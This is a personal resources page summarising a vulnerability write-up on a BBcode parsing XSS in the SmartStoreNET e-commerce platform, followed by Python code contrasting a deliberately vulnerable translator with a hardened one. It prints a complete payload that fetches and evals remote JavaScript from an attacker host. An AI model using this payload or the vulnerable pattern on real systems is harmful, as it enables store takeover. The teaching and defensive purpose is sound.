Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

SmartStoreNET - Malicious Message leading to E-Commerce Takeover- 671

Thomas Chauchefoin - Sonar Source, posted 4 years ago
  • SmartStoreNET is an open source e-commerce platform that runs on Windows servers. It offers the ability to host an online business, blogs, forums and much more. Given how popular it is, any vulnerability found in it has a wide impact.
  • BBcode is a lightweight markup language used to format messages in many Internet forum packages; it is similar in spirit to Markdown. SmartStoreNET translates BBcode using regular expressions, but before that much of the content, such as <, is converted into its HTML-encoded form.
  • When parsing links of the form [text](https://some_url.com), the URL portion is extracted from the link and placed into an anchor's href attribute. Again, this is done through a very simple regex replace call.
  • Because of the previous escaping steps, it was not possible to use a single or double quote to break out of the HTML attribute. However, there are TWO regex patterns that are applied back-to-back. Making the regex replace run more than once over the same text could cause major parsing issues.
  • The first regex checks for data of the format [url=http://www.smartstore.com]my site[/url] and turns it into a standard link. After this, another transformation is done on BBcode of the form [url]http://www.smartstore.com[/url].
  • The first regex is triggered with the parameter [url=myAttribute=myValue x=]. This transformation emits an href whose value is the text above (which is not a URL at all). Note that this is the inner link.
  • The second replace sees the transformed value above as part of a link, since the tags are nested. Even though the inner one has already been translated, the second regex treats the whole thing as a link that needs replacing. When this happens, the link already contains quotes the code did not expect. As a result, the first double quote of the already-added link terminates the href value! This allows an arbitrary attribute with an arbitrary value to be added.
  • The progression is shown below:
    1. Original payload: [url]foo[url=myAttribute=myValue x=]bar[/url]xyz[/url]
    2. After first regex replace: [url]foo<a href="myAttribute=myValue x=" >bar</a>xyz[/url]. Notice that the inner [url=...] tag has been replaced with an anchor tag.
    3. Second regex replace: <a href="foo<a href="myAttribute=myValue x=" >bar</a>xyz</a>.
  • The key step is the second regex replace, which puts text that already contains double quotes into the href. This breaks out of the attribute, which eventually leads to XSS!
  • The XSS was not simple to trigger though; only attributes can be added to the <a> tag, and the filtering done earlier limits the characters that can be used for this. To exploit it, they chose to use a style attribute. They added an animation that, when rendered, would make a web request and eval the data from the response.
  • The full payload looked like this: [url] [url=style=animation-name:fa-spin; onwebkitanimationend=$.get(`http://attacker.tld/x.js`,function(_){eval(_)}) x=] [/url] [/url]. At this point, code execution is trivial: add a custom plugin to the store. Game over!
  • Overall, this was an interesting XSS bug that required breaking the parser with weird BBcode. The patch added an additional level of sanitization at the end of the processing chain.
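The two-pass replacement the notes above walk through, as an added example that is neither SmartStoreNET's code nor code from the Sonar post: a simplified Python reconstruction (the regexes and function names are hypothetical) reproduces the attribute injection from the page's [url]foo[url=myAttribute=myValue x=]bar[/url]xyz[/url] payload, uses Python's html.parser to show the injected attribute the way a browser sees it, and places one defensive fix beside it (http(s) allow-list plus rejection of any capture that already contains markup from the earlier pass). That fix targets the root cause rather than the final sanitization pass the page says the project added. Inputs are constructed for the example.

```python
import html
import re
from html.parser import HTMLParser

# Simplified, hypothetical reconstruction of a two-pass [url] translator
# (not SmartStoreNET's code). Pass 1 handles [url=target]label[/url],
# pass 2 the bare [url]target[/url] form, in that order, as the notes describe.
URL_WITH_TARGET = re.compile(r"\[url=([^\]]+)\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)
URL_BARE = re.compile(r"\[url\](.*?)\[/url\]", re.IGNORECASE | re.DOTALL)

# Constructed inputs: the nested payload from the write-up and an ordinary link.
NESTED_PAYLOAD = "[url]foo[url=myAttribute=myValue x=]bar[/url]xyz[/url]"
PLAIN_LINK = "[url=https://example.com]my site[/url]"


def translate_vulnerable(bbcode: str) -> str:
    """Escape user text first, then splice regex captures into href unescaped."""
    text = html.escape(bbcode, quote=True)                     # < > & " ' become entities
    text = URL_WITH_TARGET.sub(r'<a href="\1">\2</a>', text)   # pass 1: inner link
    text = URL_BARE.sub(r'<a href="\1">\1</a>', text)          # pass 2 re-reads pass 1 output
    return text


# Allow-list: http(s) only, and no literal quote or angle bracket. The pre-escape
# already encoded every user-supplied quote and bracket, so a literal one inside
# a captured target can only be markup emitted by the earlier pass.
SAFE_TARGET = re.compile(r"^https?://[^\s<>\"']+$", re.IGNORECASE)


def translate_hardened(bbcode: str) -> str:
    """Same two passes, but a capture becomes a link only if it is a clean URL."""
    text = html.escape(bbcode, quote=True)

    def with_target(m: re.Match) -> str:
        target, label = m.group(1), m.group(2)
        return f'<a href="{target}">{label}</a>' if SAFE_TARGET.match(target) else m.group(0)

    def bare(m: re.Match) -> str:
        target = m.group(1)
        return f'<a href="{target}">{target}</a>' if SAFE_TARGET.match(target) else m.group(0)

    text = URL_WITH_TARGET.sub(with_target, text)
    return URL_BARE.sub(bare, text)


class _FirstAnchor(HTMLParser):
    """Records the attributes of the first <a> start tag, parsed browser-style."""

    def __init__(self) -> None:
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "a" and self.attrs is None:
            self.attrs = dict(attrs)


def anchor_attributes(markup: str) -> dict:
    """Attribute names come back lower-cased, as html.parser (and browsers) do."""
    parser = _FirstAnchor()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


if __name__ == "__main__":
    for name, fn in (("vulnerable", translate_vulnerable), ("hardened", translate_hardened)):
        out = fn(NESTED_PAYLOAD)
        print(f"{name}: {out}")
        print(f"  first <a> attributes: {anchor_attributes(out)}")
```

Running it shows the vulnerable pipeline yielding an anchor whose parsed attributes include myattribute="myValue", exactly the foothold the notes describe, while the hardened pipeline leaves the nested payload untranslated because neither capture is a clean http(s) URL; an ordinary [url=https://...]...[/url] link renders identically in both. Rejecting rather than re-encoding the capture avoids double-encoding the & already escaped in the first step.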